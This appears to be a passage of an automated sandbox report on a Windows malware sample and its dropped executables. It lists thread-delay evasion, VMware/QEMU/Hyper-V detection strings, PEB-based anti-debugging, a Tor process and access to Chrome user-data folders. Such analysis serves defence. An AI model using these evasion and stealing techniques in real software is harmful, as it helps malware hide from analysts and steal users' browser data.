Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 598516
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 598406
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 598297
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 598187
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 598078
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 597858
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 597739
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 597615
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 597349
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 597219
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 597094
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 596969
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 596797
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 596687
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 596572
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 596467
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 596250
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 596130
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 595969
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 595853
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 595712
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 595608
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 595500
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 595384
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 595250
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 595140
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 595029
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 594914
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 594797
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 594687
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 594578
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 594469
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 594344
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 594224
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 594094
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 593952
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 593844
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 593734
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 593620
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 593516
Source: C:\Users\user\AppData\Local\Temp\8F82.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 599653
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 599203
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 598860
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 598735
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 598610
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 598485
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 598250
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 597939
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 597800
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 597657
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 597530
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 597417
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 597299
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 597172
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 597063
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 596953
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 596843
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 596725
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 596592
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 596479
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 596374
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 596250
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 596124
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 596016
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 595887
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 595776
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 595668
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 595544
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 595437
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 595328
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 595213
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 595095
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 594969
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 594850
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 594734
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 594616
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 594507
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 594390
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 594258
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 594143
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 594014
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 593897
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 593791
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 593676
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\39D.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 599886
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 599777
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 599662
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 599433
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 599323
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 599213
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 599110
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 598954
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 598829
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 598703
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 598588
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 598452
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 598344
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 598230
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 598125
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 597905
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 597782
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 597657
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 597546
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 597433
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 597282
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\	Jump to behavior

Source: explorer.exe, 0000000B.00000000.1724707199.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: 9AED.exe, 00000018.00000003.2624695024.0000000008735000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware
Source: AppLaunch.exe, 00000009.00000002.2015163150.0000000005293000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\#disk&ven_vmware&prouask#4&1656f219&0&0000f5-b6bf-11d0-94f2-00a08b
Source: explorer.exe, 0000000B.00000000.1720193511.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 0000000B.00000000.1721922206.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 8F82.exe, 00000013.00000002.2006862081.000001943431F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmwAre
Source: AppLaunch.exe, 00000009.00000002.2015163150.0000000005295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: 9AED.exe, 00000018.00000003.2627778600.0000000000839000.00000004.00000020.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2627005531.0000000000832000.00000004.00000020.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2632560490.000000000083A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qemu0S0\
Source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}es=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows__COMPAT_LAYER=ElevateCreateProcess WRPMitigationrsXXZ.
Source: AppLaunch.exe, 00000009.00000002.2015163150.00000000052BF000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2015163150.000000000526A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.1724220007.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.1724220007.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 8F82.exe, 00000013.00000002.2006862081.000001943431F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qemu2
Source: explorer.exe, 0000000B.00000003.1995893543.00000000032C0000.00000004.00000001.00020000.00000000.sdmp, 8F82.exe, 00000013.00000000.1991533705.0000019432242000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: qemu5
Source: explorer.exe, 0000000B.00000000.1724707199.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: 9AED.exe, 00000018.00000002.2632416453.0000000000806000.00000004.00000020.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2627005531.0000000000806000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
Source: AppLaunch.exe, 00000005.00000002.1825314274.000000000070F000.00000004.00000020.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2144085933.0000000000873000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 0000000B.00000000.1724220007.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 0000000B.00000000.1724220007.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 0000000B.00000000.1721922206.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 0000000B.00000000.1724707199.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: AppLaunch.exe, 00000009.00000002.2015163150.000000000526A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&>n
Source: 8F82.exe, 00000013.00000002.2006862081.000001943431F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: explorer.exe, 0000000B.00000000.1724707199.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: tor-real.exe, 0000001D.00000003.2207050094.0000000004659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m SQ7jHGfSsmE5DB3dCbdtu7xJ7YSe34meVDElzhEjqOw
Source: explorer.exe, 0000000B.00000000.1721922206.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 0000000B.00000000.1724220007.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: 8F82.exe, 00000013.00000002.2006862081.000001943431F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: decr:vmware
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: 9AED.exe, 00000018.00000003.2624695024.0000000008735000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMware7R_44UDWWin32_VideoControllerGWR3M9H6VideoController120060621000000.000000-000.4709075display.infMSBDA7YY4U_2HPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemuser-PC1280 x 1024 x 4294967296 colorsCYRXESN1LMEM(
Source: explorer.exe, 0000000B.00000000.1724220007.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 0000000B.00000000.1720193511.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000000B.00000000.1720193511.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe

Code function: 0_2_00FC5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

0_2_00FC5467

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Code function: 0_2_00FC2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00FC2390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Code function: 1_2_004C2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_004C2390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Code function: 2_2_00ED2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	2_2_00ED2390
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_00905322 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00905322

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe

System information queried: ModuleInformation

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe

System information queried: CodeIntegrityInformation

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe

0_2_00FC202A

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_00904835 mov eax, dword ptr fs:[00000030h]	3_2_00904835
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008CD14E mov ecx, dword ptr fs:[00000030h]	3_2_008CD14E
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_00904581 mov eax, dword ptr fs:[00000030h]	3_2_00904581
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_009045D4 mov eax, dword ptr fs:[00000030h]	3_2_009045D4
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_00904698 mov eax, dword ptr fs:[00000030h]	3_2_00904698
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_00904627 mov eax, dword ptr fs:[00000030h]	3_2_00904627
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_0090478B mov eax, dword ptr fs:[00000030h]	3_2_0090478B
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_009047E0 mov eax, dword ptr fs:[00000030h]	3_2_009047E0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_00904872 mov eax, dword ptr fs:[00000030h]	3_2_00904872
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_0085EFC0 mov edi, dword ptr fs:[00000030h]	3_2_0085EFC0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00EFD14E mov ecx, dword ptr fs:[00000030h]	6_2_00EFD14E
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E85867 mov eax, dword ptr fs:[00000030h]	6_2_00E85867
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E83913 mov eax, dword ptr fs:[00000030h]	6_2_00E83913
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E81D4D mov eax, dword ptr fs:[00000030h]	6_2_00E81D4D
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E81A96 mov edi, dword ptr fs:[00000030h]	6_2_00E81A96
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov ecx, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0 mov eax, dword ptr fs:[00000030h]	6_2_010891C0
